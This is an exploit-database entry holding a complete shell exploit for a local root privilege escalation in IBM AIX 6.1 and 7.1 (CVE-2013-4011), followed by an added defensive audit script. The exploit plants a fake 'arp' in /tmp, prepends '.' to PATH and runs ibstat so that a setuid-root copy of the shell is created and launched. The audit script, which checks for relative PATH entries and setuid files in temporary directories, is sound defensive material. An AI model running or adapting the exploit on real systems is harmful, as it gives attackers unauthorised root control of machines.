Source: packetstorm
Author: Kristian Hermansen
ID: PACKETSTORM:123369
Published: Sep 24, 2013 - 12:00 a.m.

IBM AIX 6.1 / 7.1 Local Root Privilege Escalation


EPSS: 0.001 (percentile: 51.2%)

```sh
#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <[email protected]>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011
echo '
mm mmmmm m m
## # # #
# # # ##
#mm# # m""m
# # mm#mm m" "m
'
echo "[*] AIX root privilege escalation"
echo "[*] Kristian Erik Hermansen"
echo "[*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"
TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh

cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!

chmod 755 ${TAINT}
PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null
if [ -e ${RSHELL} ]; then
echo "[+] Access granted. Don't be evil..."
${RSHELL}
else
echo "[-] Exploit failed. Try some 0day instead..."
fi
```
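
The script above plants a file named `arp` in `/tmp`, puts `.` first in `PATH`, runs `/usr/bin/ibstat` from that directory, and then looks for a setuid copy of the shell it expected to appear. The following POSIX sh audit is an added example, not part of the original post or the author's code: it flags relative search-path entries, shows which file a bare command name would resolve to, and lists setuid files in temporary directories. The function names and the directories scanned are assumptions.

```shell
# Added defensive example; helper names and scanned directories are assumptions.

# Print every search-path entry that resolves against the current directory:
# an empty entry, "." or any other entry that does not start with "/".
unsafe_path_entries() {
    rest="$1:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case $entry in
            /*) ;;
            *) printf '%s\n' "${entry:-<empty>}" ;;
        esac
    done
}

# Show which file a bare command name would run under a given search path,
# and whether that first match comes from a relative or an absolute entry.
resolve_cmd() {
    cmd=$1
    rest="$2:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        dir=${entry:-.}
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            case $entry in
                /*) printf 'absolute %s\n' "$dir/$cmd" ;;
                *)  printf 'relative %s\n' "$dir/$cmd" ;;
            esac
            return 0
        fi
    done
    printf 'notfound %s\n' "$cmd"
}

# List setuid regular files under the given directories; a setuid copy of a
# shell in a temporary directory is the artifact the payload leaves behind.
setuid_files_in() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -xdev -type f -perm -4000 -print 2>/dev/null || :
    done
}

# Audit the current environment.
unsafe_path_entries "$PATH"
setuid_files_in /tmp /var/tmp
```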